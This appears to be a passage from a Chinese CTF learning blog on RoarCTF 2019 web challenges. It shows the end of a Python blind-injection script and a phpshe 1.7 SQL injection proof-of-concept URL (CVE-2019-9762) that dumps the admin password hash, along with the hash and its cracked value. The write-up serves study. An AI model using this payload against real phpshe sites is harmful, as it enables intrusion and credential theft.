class="keyword">yield</span> w.encode()</span><br><span class="line">        </span><br><span class="line">        r = requests.post(url, data=data(), headers=&#123;<span class="string">'Content-Type'</span>:<span class="string">'application/json'</span>&#125;)</span><br><span class="line">        <span class="keyword">if</span> r.json()[<span class="string">'msg'</span>] == <span class="string">'ok'</span>:</span><br><span class="line">            flag += j</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    print(flag)</span><br></pre></td></tr></table></figure>
<p>我是在buuctf上面复现的这道题目，要想使用py脚本，所以也需要先设置一个代理，我直接使用SocksCap代理了一个powershell来运行脚本进行注入</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/29.png" alt="29"></p>
<p>关于接口的宽口，我们在前端代码的config里面也能够找到</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/30.png" alt="30"></p>
<p>但是问题出现了，我是用代理，脚本还是没办法运行起来emmmm，</p>
<p>咕咕咕<del>~</del></p>
<p>还是太菜了，什么都不知道什么都不会，只能等知识库存再多一点的时候再来看看了</p>
<h3 id="0x06-phpShe"><a href="#0x06-phpShe" class="headerlink" title="0x06 phpShe"></a>0x06 phpShe</h3><p>题目打开后是phpshe1.7最新版，网上有XXE漏洞（CVE-2019-9761）和SQL注入漏洞（CVE-2019-9762），但是这里面notify_url.php被删掉了，所以无法使用XXE，只能SQL注入</p>
<p>漏洞分析地址：<a href="https://anquan.baidu.com/article/697" target="_blank" rel="noopener">https://anquan.baidu.com/article/697</a></p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/31.png" alt="31"></p>
<p>前台注入</p>
<p>Poc：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/include/plugin/payment/alipay/pay.php? id=pay`%20where%201=1%20union%20select%201,2, ((select`3`from(select%201,2,3,4,5,6%20union%20select%20*%2 0from%20admin)a%20limit%201,1)),4,5,6,7,8,9,10,11,12%23_</span><br></pre></td></tr></table></figure>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/32.png" alt="32"></p>
<p>得到admin用户密码的md5值：<code>2476bf5c8d3653e843b6ed42c0672b91</code></p>
<p>解md5  得到密码 <code>altman777</code></p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/33.png" alt="33"></p>
<p>做到这里我又遇到了问题，根据wp使用通过admin 和altman777就应该能登陆后台进行下一波操作，然而我这里提示密码错误，只能先搁置，等知识积累量再多一点的时候再来看看吧</p>
<p>真是个five啊！！！</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/2019040111.jpg" alt="2019040111"></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTFWEB/" rel="tag"># CTFWEB</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2019/11/06/区块链学习四-共识/" rel="prev" title="区块链学习四-共识">
      <i class="fa fa-chevron-left"></i> 区块链学习四-共识
    </a></div>
      <div class="post-nav-item">
    <a href="/2019/11/15/HTTP走私学习/" rel="next" title="HTTP走私学习">
      HTTP走私学习 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-Easy-Calc"><span class="nav-number">1.</span> <span class="nav-text">0x01 Easy Calc</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-Easy-java"><span class="nav-number">2.</span> <span class="nav-text">0x02 Easy java</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-Simple-Upload"><span class="nav-number">3.</span> <span class="nav-text">0x03 Simple Upload</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04-Online-Proxy"><span class="nav-number">4.</span> <span class="nav-text">0x04 Online Proxy</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x05-Dist"><span class="nav-number">5.</span> <span class="nav-text">0x05 Dist</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x06-phpShe"><span class="nav-number">6.</span> <span class="nav-text">0x06 phpShe</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="瑟瑟发抖咸鱼黄"
      src="/images/HeadPortrait.png">
  <p class="site-author-name" itemprop="name">瑟瑟发抖咸鱼黄</p>
  <div class="site-description" itemprop="description">您看！工具人啥都不配拥有!</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">38</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title">
      <i class="fa fa-fw fa-link"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://gorgias.me/" title="https://gorgias.me/" rel="noopener" target="_blank">巨佬</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://couplee.wang/" title="http://couplee.wang/" rel="noopener" target="_blank">wnagzihxa1n</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://blog.tity.xyz/" title="https://blog.tity.xyz/" rel="noopener" target="_blank">WarrenRyan</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://pukrr.github.io/" title="https://pukrr.github.io/" rel="noopener" target="_blank">pukrr</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://rinbn.com/" title="http://rinbn.com/" rel="noopener" target="_blank">Rinbn</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.imzj.top/" title="https://www.imzj.top/" rel="noopener" target="_blank">imzj</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://q0o0p.top" title="http://q0o0p.top" rel="noopener" target="_blank">q0o0p</a>
        </li>
    </ul>
  </div>

      </div>
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=40915694&auto=0&height=66"></iframe>
    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">瑟瑟发抖咸鱼黄</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.9.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">Theme – <a href="https://muse.theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.7.0
  </div>

        








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='150' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script>
<script src="/js/schemes/muse.js"></script>
<script src="/js/next-boot.js"></script>



  















  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/z16.model.json"},"display":{"position":"left","width":200,"height":400},"mobile":{"show":true},"react":{"opacity":0.7},"log":false});</script></body>
</html>
